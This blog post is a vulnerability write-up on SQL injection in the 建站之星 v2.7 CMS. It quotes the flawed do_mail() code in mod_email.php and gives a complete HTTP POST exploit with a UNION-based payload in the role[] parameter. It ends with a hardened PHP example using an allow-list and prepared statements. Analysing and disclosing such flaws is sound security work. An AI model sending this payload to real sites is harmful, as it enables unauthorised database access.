建站之星 v2.7 SQL Injection

This CMS showed up as a challenge in a CTF, so I downloaded the source and took a look.

The problem is in module/mod_email.php, around line 147:

public function do_mail(){
    global $db;
    $title = ParamHolder::get("title");
    $msg = ParamHolder::get("email_s");
    $msg .= ParamHolder::get("email_m");
    $roles = ParamHolder::get("role");
    $type = ParamHolder::get("type");
    $user_email = ParamHolder::get('users');
    $send_id = SessionHolder::get("user/id");
    $time = time();
    $ok = 0;
    ............. omitted
    else{ // bulk mail
        foreach ($roles as $k=>$row){
            // $row is taken straight from the request and concatenated into the query
            $sql = "select id,login,email from ".Config::$tbl_prefix."users where s_role='{".$row."}'";
            $res = $db->query($sql);
            $emails = $res->fetchRows();
            if (!empty($emails)) {
                foreach ($emails as $eml){
                    if($this->send_mail($title,$msg,$eml['email'])){
                        $ok++;
                        $sql = "insert into ".Config::$tbl_prefix."emails(`title`,`content`,user_id,user_name,is_mail,send_id,is_read,is_ok,create_time) values('{$title}','{$msg}','{$eml['id']}','{$eml['login']}',1,{$send_id},0,1,'{$time}')";
                        $db->query($sql);
                    }else{
                        $sql = "insert into ".Config::$tbl_prefix."emails(`title`,`content`,user_id,user_name,is_mail,send_id,is_read,is_ok,create_time) values('{$title}','{$msg}','{$eml['id']}','{$eml['login']}',1,{$send_id},0,0,'{$time}')";
                        $db->query($sql);
                        $s_err[] = $eml['login'];
                    }
                }
            }else{

The SQL statement is: $sql = "select id,login,email from ".Config::$tbl_prefix."users where s_role='{".$row."}'";

Here $row is each element of $roles as the loop iterates over it (the role[] request parameter). It is not filtered or escaped in any way before being concatenated into the query, which leads to SQL injection.

Payload:

POST /index.php?_a=do_mail&_m=mod_email HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Host: localhost
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Content-Length: 112
title=aa&email_s=a&email_m=a&type=a&users=aaaa'|aaa&role[]=abdc}'+union+select+1,user(),3#
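The fix a maintainer would want, as an added example that is not the CMS's own code: the string-built query from do_mail() beside a hardened version that allow-lists the role value and binds it through a mysqli prepared statement. The mysqli connection $db, the table-prefix argument, the role names in ALLOWED_ROLES and the availability of get_result() (mysqlnd) are assumptions.

```php
<?php
// Added example, not code from 建站之星. The role names below are hypothetical;
// the real allow-list would come from the CMS's own role definitions.
const ALLOWED_ROLES = ['admin', 'editor', 'member'];

/** Vulnerable form (as in the CMS): $row is concatenated into the SQL string. */
function users_by_role_vulnerable(mysqli $db, string $prefix, string $row): array
{
    $sql = "select id,login,email from {$prefix}users where s_role='{" . $row . "}'";
    $res = $db->query($sql);
    return $res ? $res->fetch_all(MYSQLI_ASSOC) : [];
}

/**
 * Hardened form: reject anything that is not a known role, then bind the
 * value as a parameter so it can never alter the statement's structure.
 * $prefix must be a trusted configuration value (Config::$tbl_prefix), never input.
 */
function users_by_role_safe(mysqli $db, string $prefix, $roles): array
{
    // ParamHolder::get("role") may yield a string or an array; normalise it.
    $roles = is_array($roles) ? $roles : [$roles];
    $stmt = $db->prepare("select id,login,email from {$prefix}users where s_role = ?");
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $bound = '';
    $stmt->bind_param('s', $bound); // bound by reference; reassigned per role
    $out = [];
    foreach ($roles as $row) {
        if (!is_string($row) || !in_array($row, ALLOWED_ROLES, true)) {
            // Unknown role: log it for detection and skip it; the union payload
            // shown above never reaches the database.
            error_log('do_mail: rejected role value ' . json_encode($row));
            continue;
        }
        $bound = '{' . $row . '}'; // keep the CMS's "{role}" storage format
        $stmt->execute();
        foreach ($stmt->get_result()->fetch_all(MYSQLI_ASSOC) as $user) {
            $out[] = $user;
        }
    }
    $stmt->close();
    return $out;
}
```

Even with the allow-list, the bound parameter is what makes the query safe; the allow-list additionally gives a log line to alert on when someone probes the parameter.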

Unless otherwise stated, all articles on this blog are licensed under CC BY-NC-SA 4.0. Please cite the source when reposting!
Article URL: https://0x20h.com/p/2642571319.html
